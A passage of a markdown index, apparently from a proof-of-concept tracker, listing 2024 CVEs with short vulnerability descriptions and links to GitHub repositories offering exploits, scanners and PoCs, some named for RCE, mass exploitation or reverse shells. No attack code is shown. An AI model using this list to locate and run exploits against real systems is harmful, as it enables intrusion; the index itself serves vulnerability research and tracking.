- [zam89/CVE-2024-24919](https://github.com/zam89/CVE-2024-24919)
- [satriarizka/CVE-2024-24919](https://github.com/satriarizka/CVE-2024-24919)
- [RevoltSecurities/CVE-2024-24919](https://github.com/RevoltSecurities/CVE-2024-24919)
- [Vulnpire/CVE-2024-24919](https://github.com/Vulnpire/CVE-2024-24919)
- [seed1337/CVE-2024-24919-POC](https://github.com/seed1337/CVE-2024-24919-POC)
- [0xYumeko/CVE-2024-24919](https://github.com/0xYumeko/CVE-2024-24919)
- [Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN](https://github.com/Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN)
- [smackerdodi/CVE-2024-24919-nuclei-templater](https://github.com/smackerdodi/CVE-2024-24919-nuclei-templater)
- [GoatSecurity/CVE-2024-24919](https://github.com/GoatSecurity/CVE-2024-24919)
- [GlobalsecureAcademy/CVE-2024-24919](https://github.com/GlobalsecureAcademy/CVE-2024-24919)
- [nexblade12/CVE-2024-24919](https://github.com/nexblade12/CVE-2024-24919)
- [un9nplayer/CVE-2024-24919](https://github.com/un9nplayer/CVE-2024-24919)
- [0xkalawy/CVE-2024-24919](https://github.com/0xkalawy/CVE-2024-24919)
- [Cappricio-Securities/CVE-2024-24919](https://github.com/Cappricio-Securities/CVE-2024-24919)
- [fernandobortotti/CVE-2024-24919](https://github.com/fernandobortotti/CVE-2024-24919)
- [nicolvsrlr27/CVE-2024-24919](https://github.com/nicolvsrlr27/CVE-2024-24919)
- [gurudattch/CVE-2024-24919](https://github.com/gurudattch/CVE-2024-24919)
- [YN1337/CVE-2024-24919](https://github.com/YN1337/CVE-2024-24919)
- [ifconfig-me/CVE-2024-24919-Bulk-Scanner](https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner)
- [r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check](https://github.com/r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check)
- [r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN](https://github.com/r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN)
- [J4F9S5D2Q7/CVE-2024-24919-CHECKPOINT](https://github.com/J4F9S5D2Q7/CVE-2024-24919-CHECKPOINT)
- [mr-kasim-mehar/CVE-2024-24919-Exploit](https://github.com/mr-kasim-mehar/CVE-2024-24919-Exploit)
- [B1naryo/CVE-2024-24919-POC](https://github.com/B1naryo/CVE-2024-24919-POC)
- [Expl0itD0g/CVE-2024-24919---Poc](https://github.com/Expl0itD0g/CVE-2024-24919---Poc)
- [bigb0x/CVE-2024-24919-Sniper](https://github.com/bigb0x/CVE-2024-24919-Sniper)
- [birdlex/cve-2024-24919-checker](https://github.com/birdlex/cve-2024-24919-checker)
- [Rug4lo/CVE-2024-24919-Exploit](https://github.com/Rug4lo/CVE-2024-24919-Exploit)
- [0nin0hanz0/CVE-2024-24919-PoC](https://github.com/0nin0hanz0/CVE-2024-24919-PoC)
- [GuayoyoCyber/CVE-2024-24919](https://github.com/GuayoyoCyber/CVE-2024-24919)
- [0xans/CVE-2024-24919](https://github.com/0xans/CVE-2024-24919)
- [Tim-Hoekstra/CVE-2024-24919](https://github.com/Tim-Hoekstra/CVE-2024-24919)
- [starlox0/CVE-2024-24919-POC](https://github.com/starlox0/CVE-2024-24919-POC)
- [nullcult/CVE-2024-24919-Exploit](https://github.com/nullcult/CVE-2024-24919-Exploit)
- [satchhacker/cve-2024-24919](https://github.com/satchhacker/cve-2024-24919)
- [verylazytech/CVE-2024-24919](https://github.com/verylazytech/CVE-2024-24919)
- [protonnegativo/CVE-2024-24919](https://github.com/protonnegativo/CVE-2024-24919)
- [SalehLardhi/CVE-2024-24919](https://github.com/SalehLardhi/CVE-2024-24919)
- [ShadowByte1/CVE-2024-24919](https://github.com/ShadowByte1/CVE-2024-24919)
- [H3KEY/CVE-2024-24919](https://github.com/H3KEY/CVE-2024-24919)
- [Jutrm/cve-2024-24919](https://github.com/Jutrm/cve-2024-24919)
- [LuisMateo1/Arbitrary-File-Read-CVE-2024-24919](https://github.com/LuisMateo1/Arbitrary-File-Read-CVE-2024-24919)
- [AhmedMansour93/Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-](https://github.com/AhmedMansour93/Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-)
- [geniuszlyy/CVE-2024-24919](https://github.com/geniuszlyy/CVE-2024-24919)
- [skyrowalker/CVE-2024-24919](https://github.com/skyrowalker/CVE-2024-24919)
- [sar-3mar/CVE-2024-24919_POC](https://github.com/sar-3mar/CVE-2024-24919_POC)
### CVE-2024-25092 (2024-06-09)
Missing Authorization vulnerability in XLPlugins NextMove Lite.This issue affects NextMove Lite: from n/a through 2.17.0.
- [RandomRobbieBF/CVE-2024-25092](https://github.com/RandomRobbieBF/CVE-2024-25092)
### CVE-2024-25153 (2024-03-13)
A directory traversal within the ‘ftpservlet’ of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended ‘uploadtemp’ directory with a specially crafted POST request. In situations where a file is successfully uploaded to web portal’s DocumentRoot, specially crafted JSP files could be used to execute code, including web shells.
- [nettitude/CVE-2024-25153](https://github.com/nettitude/CVE-2024-25153)
- [rainbowhatrkn/CVE-2024-25153](https://github.com/rainbowhatrkn/CVE-2024-25153)
### CVE-2024-25169 (2024-02-28)
An issue in Mezzanine v6.0.0 allows attackers to bypass access control mechanisms in the admin panel via a crafted request.
- [shenhav12/CVE-2024-25169-Mezzanine-v6.0.0](https://github.com/shenhav12/CVE-2024-25169-Mezzanine-v6.0.0)
### CVE-2024-25170 (2024-02-28)
An issue in Mezzanine v6.0.0 allows attackers to bypass access controls via manipulating the Host header.
- [shenhav12/CVE-2024-25170-Mezzanine-v6.0.0](https://github.com/shenhav12/CVE-2024-25170-Mezzanine-v6.0.0)
### CVE-2024-25175 (2024-03-25)
An issue in Kickdler before v1.107.0 allows attackers to provide an XSS payload via a HTTP response splitting attack.
- [jet-pentest/CVE-2024-25175](https://github.com/jet-pentest/CVE-2024-25175)
### CVE-2024-25202 (2024-02-28)
Cross Site Scripting vulnerability in Phpgurukul User Registration & Login and User Management System 1.0 allows attackers to run arbitrary code via the search bar.
- [Agampreet-Singh/CVE-2024-25202](https://github.com/Agampreet-Singh/CVE-2024-25202)
### CVE-2024-25227 (2024-03-15)
SQL Injection vulnerability in ABO.CMS version 5.8, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via the tb_login parameter in admin login page.
- [thetrueartist/ABO.CMS-Login-SQLi-CVE-2024-25227](https://github.com/thetrueartist/ABO.CMS-Login-SQLi-CVE-2024-25227)
- [thetrueartist/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227](https://github.com/thetrueartist/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227)
### CVE-2024-25270 (2024-09-12)
An issue in Mirapolis LMS 4.6.XX allows authenticated users to exploit an Insecure Direct Object Reference (IDOR) vulnerability by manipulating the ID parameter and increment STEP parameter, leading to the exposure of sensitive user data.
- [fbkcs/CVE-2024-25270](https://github.com/fbkcs/CVE-2024-25270)
### CVE-2024-25277
- [maen08/CVE-2024-25277](https://github.com/maen08/CVE-2024-25277)
### CVE-2024-25278
- [sajaljat/CVE-2024-25278](https://github.com/sajaljat/CVE-2024-25278)
### CVE-2024-25279
- [sajaljat/CVE-2024-25279](https://github.com/sajaljat/CVE-2024-25279)
### CVE-2024-25280
- [sajaljat/CVE-2024-25280](https://github.com/sajaljat/CVE-2024-25280)
### CVE-2024-25281
- [sajaljat/CVE-2024-25281](https://github.com/sajaljat/CVE-2024-25281)
### CVE-2024-25291 (2024-02-29)
Deskfiler v1.2.3 allows attackers to execute arbitrary code via uploading a crafted plugin.
- [EQSTLab/CVE-2024-25291](https://github.com/EQSTLab/CVE-2024-25291)
### CVE-2024-25292 (2024-02-29)
Cross-site scripting (XSS) vulnerability in RenderTune v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Upload Title parameter.
- [EQSTLab/CVE-2024-25292](https://github.com/EQSTLab/CVE-2024-25292)
### CVE-2024-25293 (2024-03-01)
mjml-app versions 3.0.4 and 3.1.0-beta were discovered to contain a remote code execution (RCE) via the href attribute.
- [EQSTLab/CVE-2024-25293](https://github.com/EQSTLab/CVE-2024-25293)
### CVE-2024-25376 (2024-04-11)
An issue discovered in Thesycon Software Solutions Gmbh & Co. KG TUSBAudio MSI-based installers before 5.68.0 allows a local attacker to execute arbitrary code via the msiexec.exe repair mode.
- [ewilded/CVE-2024-25376-POC](https://github.com/ewilded/CVE-2024-25376-POC)
### CVE-2024-25381 (2024-02-21)
There is a Stored XSS Vulnerability in Emlog Pro 2.2.8 Article Publishing, due to non-filtering of quoted content.
- [Ox130e07d/CVE-2024-25381](https://github.com/Ox130e07d/CVE-2024-25381)
### CVE-2024-25411
- [paragbagul111/CVE-2024-25411](https://github.com/paragbagul111/CVE-2024-25411)
### CVE-2024-25412
- [paragbagul111/CVE-2024-25412](https://github.com/paragbagul111/CVE-2024-25412)
### CVE-2024-25423 (2024-02-22)
An issue in MAXON CINEMA 4D R2024.2.0 allows a local attacker to execute arbitrary code via a crafted c4d_base.xdl64 file.
- [DriverUnload/cve-2024-25423](https://github.com/DriverUnload/cve-2024-25423)
### CVE-2024-25466 (2024-02-16)
Directory Traversal vulnerability in React Native Document Picker before v.9.1.1 and fixed in v.9.1.1 allows a local attacker to execute arbitrary code via a crafted script to the Android library component.
- [FixedOctocat/CVE-2024-25466](https://github.com/FixedOctocat/CVE-2024-25466)
### CVE-2024-25503 (2024-04-04)
Cross Site Scripting (XSS) vulnerability in Advanced REST Client v.17.0.9 allows a remote attacker to execute arbitrary code and obtain sensitive information via a crafted script to the edit details parameter of the New Project function.
- [EQSTLab/CVE-2024-25503](https://github.com/EQSTLab/CVE-2024-25503)
### CVE-2024-25600 (2024-06-04)
Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection.This issue affects Bricks Builder: from n/a through 1.9.6.
- [Chocapikk/CVE-2024-25600](https://github.com/Chocapikk/CVE-2024-25600)
- [Christbowel/CVE-2024-25600_Nuclei-Template](https://github.com/Christbowel/CVE-2024-25600_Nuclei-Template)
- [Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress](https://github.com/Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress)
- [hy011121/CVE-2024-25600-wordpress-Exploit-RCE](https://github.com/hy011121/CVE-2024-25600-wordpress-Exploit-RCE)
- [K3ysTr0K3R/CVE-2024-25600-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT)
- [X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE](https://github.com/X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE)
- [svchostmm/CVE-2024-25600-mass](https://github.com/svchostmm/CVE-2024-25600-mass)
- [ivanbg2004/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress](https://github.com/ivanbg2004/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress)
- [k3lpi3b4nsh33/CVE-2024-25600](https://github.com/k3lpi3b4nsh33/CVE-2024-25600)
- [WanLiChangChengWanLiChang/CVE-2024-25600](https://github.com/WanLiChangChengWanLiChang/CVE-2024-25600)
- [KaSooMi0228/CVE-2024-25600-Bricks-Builder-WordPress](https://github.com/KaSooMi0228/CVE-2024-25600-Bricks-Builder-WordPress)
- [wh6amiGit/CVE-2024-25600](https://github.com/wh6amiGit/CVE-2024-25600)
### CVE-2024-25641 (2024-05-13)
Cacti provides an operational monitoring and fault management framework. Prior to version 1.2.27, an arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server. The vulnerability is located within the `import_package()` function defined into the `/lib/import.php` script. The function blindly trusts the filename and file content provided within the XML data, and writes such files into the Cacti base path (or even outside, since path traversal sequences are not filtered). This can be exploited to write or overwrite arbitrary files on the web server, leading to execution of arbitrary PHP code or other security impacts. Version 1.2.27 contains a patch for this issue.
- [5ma1l/CVE-2024-25641](https://github.com/5ma1l/CVE-2024-25641)
- [thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26](https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26)
- [Safarchand/CVE-2024-25641](https://github.com/Safarchand/CVE-2024-25641)
- [StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26](https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26)
### CVE-2024-25723 (2024-02-27)
ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. These are also patched versions: 0.44.4, 0.43.1, and 0.42.2.
- [david-botelho-mariano/exploit-CVE-2024-25723](https://github.com/david-botelho-mariano/exploit-CVE-2024-25723)
### CVE-2024-25731 (2024-03-04)
The Elink Smart eSmartCam (com.cn.dq.ipc) application 2.1.5 for Android contains hardcoded AES encryption keys that can be extracted from a binary file. Thus, encryption can be defeated by an attacker who can observe packet data (e.g., over Wi-Fi).
- [actuator/com.cn.dq.ipc](https://github.com/actuator/com.cn.dq.ipc)
### CVE-2024-25733
- [hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC](https://github.com/hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC)
### CVE-2024-25809
- [sajaljat/CVE-2024-25809](https://github.com/sajaljat/CVE-2024-25809)
### CVE-2024-25832 (2024-02-28)
F-logic DataCube3 v1.0 is vulnerable to unrestricted file upload, which could allow an authenticated malicious actor to upload a file of dangerous type by manipulating the filename extension.
- [0xNslabs/CVE-2024-25832-PoC](https://github.com/0xNslabs/CVE-2024-25832-PoC)
### CVE-2024-25897 (2024-02-21)
ChurchCRM 5.5.0 FRCatalog.php is vulnerable to Blind SQL Injection (Time-based) via the CurrentFundraiser GET parameter.
- [i-100-user/CVE-2024-25897](https://github.com/i-100-user/CVE-2024-25897)
### CVE-2024-26026 (2024-05-08)
\n\n\nAn SQL injection vulnerability exists in the BIG-IP Next Central Manager API (URI). Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated\n\n
- [passwa11/CVE-2024-26026](https://github.com/passwa11/CVE-2024-26026)
- [GRTMALDET/Big-IP-Next-CVE-2024-26026](https://github.com/GRTMALDET/Big-IP-Next-CVE-2024-26026)
### CVE-2024-26144 (2024-02-27)
Rails is a web-application framework. Starting with version 5.2.0, there is a possible sensitive session information leak in Active Storage. By default, Active Storage sends a Set-Cookie header along with the user's session cookie when serving blobs. It also sets Cache-Control to public. Certain proxies may cache the Set-Cookie, leading to an information leak. The vulnerability is fixed in 7.0.8.1 and 6.1.7.7.
- [gmo-ierae/CVE-2024-26144-test](https://github.com/gmo-ierae/CVE-2024-26144-test)
### CVE-2024-26160 (2024-03-12)
Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability
- [0x00Alchemist/CVE-2024-26160](https://github.com/0x00Alchemist/CVE-2024-26160)
### CVE-2024-26218 (2024-04-09)
Windows Kernel Elevation of Privilege Vulnerability
- [exploits-forsale/CVE-2024-26218](https://github.com/exploits-forsale/CVE-2024-26218)
### CVE-2024-26229 (2024-04-09)
Windows CSC Service Elevation of Privilege Vulnerability
- [varwara/CVE-2024-26229](https://github.com/varwara/CVE-2024-26229)
- [RalfHacker/CVE-2024-26229-exploit](https://github.com/RalfHacker/CVE-2024-26229-exploit)
- [apkc/CVE-2024-26229-BOF](https://github.com/apkc/CVE-2024-26229-BOF)
- [team-MineDEV/CVE-2024-26229](https://github.com/team-MineDEV/CVE-2024-26229)
- [Cracked5pider/eop24-26229](https://github.com/Cracked5pider/eop24-26229)
- [mqxmm/CVE-2024-26229](https://github.com/mqxmm/CVE-2024-26229)
### CVE-2024-26230 (2024-04-09)
Windows Telephony Server Elevation of Privilege Vulnerability
- [kiwids0220/CVE-2024-26230](https://github.com/kiwids0220/CVE-2024-26230)
- [Wa1nut4/CVE-2024-26230](https://github.com/Wa1nut4/CVE-2024-26230)
### CVE-2024-26304 (2024-05-01)
There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system. \n\n
- [Roud-Roud-Agency/CVE-2024-26304-RCE-exploits](https://github.com/Roud-Roud-Agency/CVE-2024-26304-RCE-exploits)
- [X-Projetion/CVE-2024-26304-RCE-exploit](https://github.com/X-Projetion/CVE-2024-26304-RCE-exploit)
### CVE-2024-26308 (2024-02-19)
Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress.This issue affects Apache Commons Compress: from 1.21 before 1.26.\n\nUsers are recommended to upgrade to version 1.26, which fixes the issue.\n\n
- [crazycatMyopic/cve](https://github.com/crazycatMyopic/cve)
### CVE-2024-26475 (2024-03-14)
An issue in radareorg radare2 v.0.9.7 through v.5.8.6 and fixed in v.5.8.8 allows a local attacker to cause a denial of service via the grub_sfs_read_extent function.
- [TronciuVlad/CVE-2024-26475](https://github.com/TronciuVlad/CVE-2024-26475)
### CVE-2024-26503 (2024-03-14)
Unrestricted File Upload vulnerability in Greek Universities Network Open eClass v.3.15 and earlier allows attackers to run arbitrary code via upload of crafted file to certbadge.php endpoint.
- [RoboGR00t/Exploit-CVE-2024-26503](https://github.com/RoboGR00t/Exploit-CVE-2024-26503)
### CVE-2024-26521 (2024-03-12)
HTML Injection vulnerability in CE Phoenix v1.0.8.20 and before allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted payload to the english.php component.
- [hackervegas001/CVE-2024-26521](https://github.com/hackervegas001/CVE-2024-26521)
### CVE-2024-26534
- [sajaljat/CVE-2024-26534](https://github.com/sajaljat/CVE-2024-26534)
### CVE-2024-26535
- [sajaljat/CVE-2024-26535](https://github.com/sajaljat/CVE-2024-26535)
### CVE-2024-26560
- [sajaljat/CVE-2024-26560](https://github.com/sajaljat/CVE-2024-26560)
### CVE-2024-26574 (2024-04-08)
Insecure Permissions vulnerability in Wondershare Filmora v.13.0.51 allows a local attacker to execute arbitrary code via a crafted script to the WSNativePushService.exe
- [Alaatk/CVE-2024-26574](https://github.com/Alaatk/CVE-2024-26574)
### CVE-2024-26581 (2024-02-20)
In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_rbtree: skip end interval element from gc\n\nrbtree lazy gc on insert might collect an end interval element that has\nbeen just added in this transactions, skip end interval elements that\nare not yet active.
- [madfxr/CVE-2024-26581-Checker](https://github.com/madfxr/CVE-2024-26581-Checker)
- [laoqin1234/Linux-Root-CVE-2024-26581-PoC](https://github.com/laoqin1234/Linux-Root-CVE-2024-26581-PoC)
### CVE-2024-26817 (2024-04-13)
In the Linux kernel, the following vulnerability has been resolved:\n\namdkfd: use calloc instead of kzalloc to avoid integer overflow\n\nThis uses calloc instead of doing the multiplication which might\noverflow.
- [MaherAzzouzi/CVE-2024-26817-amdkfd](https://github.com/MaherAzzouzi/CVE-2024-26817-amdkfd)
### CVE-2024-27088 (2024-02-26)
es5-ext contains ECMAScript 5 extensions. Passing functions with very long names or complex default argument names into `function#copy` or `function#toStringTokens` may cause the script to stall. The vulnerability is patched in v0.10.63.
- [200101WhoAmI/CVE-2024-27088](https://github.com/200101WhoAmI/CVE-2024-27088)
### CVE-2024-27130 (2024-05-21)
A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute code via a network.\n\nWe have already fixed the vulnerability in the following version:\nQTS 5.1.7.2770 build 20240520 and later\nQuTS hero h5.1.7.2770 build 20240520 and later
- [watchtowrlabs/CVE-2024-27130](https://github.com/watchtowrlabs/CVE-2024-27130)
- [d0rb/CVE-2024-27130](https://github.com/d0rb/CVE-2024-27130)
### CVE-2024-27173 (2024-06-14)
Remote Command program allows an attacker to get Remote Code Execution by overwriting existing Python files containing executable code. This vulnerability can be executed in combination with other vulnerabilities and difficult to execute alone. So, the CVSS score for this vulnerability alone is lower than the score listed in the "Base Score" of this vulnerability. For detail on related other vulnerabilities, please ask to the below contact point.\n https://www.toshibatec.com/contacts/products/ \nAs for the affected products/models/versions, see the reference URL.
- [Ieakd/0day-POC-for-CVE-2024-27173](https://github.com/Ieakd/0day-POC-for-CVE-2024-27173)
### CVE-2024-27198 (2024-03-04)
In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible
- [Chocapikk/CVE-2024-27198](https://github.com/Chocapikk/CVE-2024-27198)
- [yoryio/CVE-2024-27198](https://github.com/yoryio/CVE-2024-27198)
- [W01fh4cker/CVE-2024-27198-RCE](https://github.com/W01fh4cker/CVE-2024-27198-RCE)
- [rampantspark/CVE-2024-27198](https://github.com/rampantspark/CVE-2024-27198)
- [passwa11/CVE-2024-27198-RCE](https://github.com/passwa11/CVE-2024-27198-RCE)
- [CharonDefalt/CVE-2024-27198-RCE](https://github.com/CharonDefalt/CVE-2024-27198-RCE)
- [K3ysTr0K3R/CVE-2024-27198-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-27198-EXPLOIT)
- [Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-](https://github.com/Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-)
- [Stuub/RCity-CVE-2024-27198](https://github.com/Stuub/RCity-CVE-2024-27198)
- [HPT-Intern-Task-Submission/CVE-2024-27198](https://github.com/HPT-Intern-Task-Submission/CVE-2024-27198)
- [jrbH4CK/CVE-2024-27198](https://github.com/jrbH4CK/CVE-2024-27198)
- [geniuszlyy/CVE-2024-27198](https://github.com/geniuszlyy/CVE-2024-27198)
- [Cythonic1/CVE-2024-27198_POC](https://github.com/Cythonic1/CVE-2024-27198_POC)
### CVE-2024-27282 (-)
An issue was discovered in Ruby 3.x through 3.3.0. If attacker-supplied data is provided to the Ruby regex compiler, it is possible to extract arbitrary heap data relative to the start of the text, including pointers and sensitive strings. The fixed versions are 3.0.7, 3.1.5, 3.2.4, and 3.3.1.
- [Abo5/CVE-2024-27282](https://github.com/Abo5/CVE-2024-27282)
### CVE-2024-27292 (2024-02-29)
Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
- [th3gokul/CVE-2024-27292](https://github.com/th3gokul/CVE-2024-27292)
### CVE-2024-27316 (2024-04-04)
HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.
- [lockness-Ko/CVE-2024-27316](https://github.com/lockness-Ko/CVE-2024-27316)
- [aeyesec/CVE-2024-27316_poc](https://github.com/aeyesec/CVE-2024-27316_poc)
### CVE-2024-27348 (2024-04-22)
RCE-Remote Command Execution vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11\n\nUsers are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.\n\n
- [Zeyad-Azima/CVE-2024-27348](https://github.com/Zeyad-Azima/CVE-2024-27348)
- [kljunowsky/CVE-2024-27348](https://github.com/kljunowsky/CVE-2024-27348)
- [jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE](https://github.com/jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE)
### CVE-2024-27460 (2024-05-10)
A privilege escalation exists in the updater for Plantronics Hub 3.25.1 and below.
- [xct/CVE-2024-27460](https://github.com/xct/CVE-2024-27460)
- [Alaatk/CVE-2024-27460](https://github.com/Alaatk/CVE-2024-27460)
- [10cks/CVE-2024-27460-installer](https://github.com/10cks/CVE-2024-27460-installer)
### CVE-2024-27462
- [Alaatk/CVE-2024-27462](https://github.com/Alaatk/CVE-2024-27462)
### CVE-2024-27474 (2024-04-10)
Leantime 3.0.6 is vulnerable to Cross Site Request Forgery (CSRF). This vulnerability allows malicious actors to perform unauthorized actions on behalf of authenticated users, specifically administrators.
- [dead1nfluence/Leantime-POC](https://github.com/dead1nfluence/Leantime-POC)
### CVE-2024-27518 (2024-04-29)
An issue in SUPERAntiSyware Professional X 10.0.1262 and 10.0.1264 allows unprivileged attackers to escalate privileges via a restore of a crafted DLL file into the C:\Program Files\SUPERAntiSpyware folder.
- [secunnix/CVE-2024-27518](https://github.com/secunnix/CVE-2024-27518)
### CVE-2024-27564 (2024-03-05)
A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.
- [MuhammadWaseem29/SSRF-Exploit-CVE-2024-27564](https://github.com/MuhammadWaseem29/SSRF-Exploit-CVE-2024-27564)
- [Quantum-Hacker/CVE-2024-27564](https://github.com/Quantum-Hacker/CVE-2024-27564)
### CVE-2024-27619 (2024-03-29)
Dlink Dir-3040us A1 1.20b03a hotfix is vulnerable to Buffer Overflow. Any user having read/write access to ftp server can write directly to ram causing buffer overflow if file or files uploaded are greater than available ram. Ftp server allows change of directory to root which is one level up than root of usb flash directory. During upload ram is getting filled and causing system resource exhaustion (no free memory) which causes system to crash and reboot.
- [ioprojecton/dir-3040_dos](https://github.com/ioprojecton/dir-3040_dos)
### CVE-2024-27630 (2024-04-08)
Insecure Direct Object Reference (IDOR) in GNU Savane v.3.12 and before allows a remote attacker to delete arbitrary files via crafted input to the trackers_data_delete_file function.
- [ally-petitt/CVE-2024-27630](https://github.com/ally-petitt/CVE-2024-27630)
### CVE-2024-27631 (2024-04-08)
Cross Site Request Forgery vulnerability in GNU Savane v.3.12 and before allows a remote attacker to escalate privileges via siteadmin/usergroup.php
- [ally-petitt/CVE-2024-27631](https://github.com/ally-petitt/CVE-2024-27631)
### CVE-2024-27632 (2024-04-08)
An issue in GNU Savane v.3.12 and before allows a remote attacker to escalate privileges via the form_id in the form_header() function.
- [ally-petitt/CVE-2024-27632](https://github.com/ally-petitt/CVE-2024-27632)
### CVE-2024-27665 (2024-04-09)
Unifiedtransform v2.X is vulnerable to Stored Cross-Site Scripting (XSS) via file upload feature in Syllabus module.
- [Thirukrishnan/CVE-2024-27665](https://github.com/Thirukrishnan/CVE-2024-27665)
### CVE-2024-27673
- [Alaatk/CVE-2024-27673](https://github.com/Alaatk/CVE-2024-27673)
### CVE-2024-27674 (2024-04-03)
Macro Expert through 4.9.4 allows BUILTIN\Users:(OI)(CI)(M) access to the "%PROGRAMFILES(X86)%\GrassSoft\Macro Expert" folder and thus an unprivileged user can escalate to SYSTEM by replacing the MacroService.exe binary.
- [Alaatk/CVE-2024-27674](https://github.com/Alaatk/CVE-2024-27674)
### CVE-2024-27697
- [SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697](https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697)
### CVE-2024-27766
- [Ant1sec-ops/CVE-2024-27766](https://github.com/Ant1sec-ops/CVE-2024-27766)
### CVE-2024-27804 (2024-05-13)
The issue was addressed with improved memory handling. This issue is fixed in iOS 17.5 and iPadOS 17.5, tvOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges.
- [R00tkitSMM/CVE-2024-27804](https://github.com/R00tkitSMM/CVE-2024-27804)
### CVE-2024-27815 (2024-06-10)
An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges.
- [jprx/CVE-2024-27815](https://github.com/jprx/CVE-2024-27815)
### CVE-2024-27954 (2024-05-17)
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WP Automatic Automatic allows Path Traversal, Server Side Request Forgery.This issue affects Automatic: from n/a through 3.92.0.
- [fa-rrel/CVE-2024-27954](https://github.com/fa-rrel/CVE-2024-27954)
- [Quantum-Hacker/CVE-2024-27954](https://github.com/Quantum-Hacker/CVE-2024-27954)
### CVE-2024-27956 (2024-03-21)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0.\n\n
- [truonghuuphuc/CVE-2024-27956](https://github.com/truonghuuphuc/CVE-2024-27956)
- [diego-tella/CVE-2024-27956-RCE](https://github.com/diego-tella/CVE-2024-27956-RCE)
- [X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN](https://github.com/X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN)
- [FoxyProxys/CVE-2024-27956](https://github.com/FoxyProxys/CVE-2024-27956)
- [k3ppf0r/CVE-2024-27956](https://github.com/k3ppf0r/CVE-2024-27956)
- [AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956](https://github.com/AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956)
- [W3BW/CVE-2024-27956-RCE-File-Package](https://github.com/W3BW/CVE-2024-27956-RCE-File-Package)
- [Cappricio-Securities/CVE-2024-27956](https://github.com/Cappricio-Securities/CVE-2024-27956)
- [itzheartzz/MASS-CVE-2024-27956](https://github.com/itzheartzz/MASS-CVE-2024-27956)
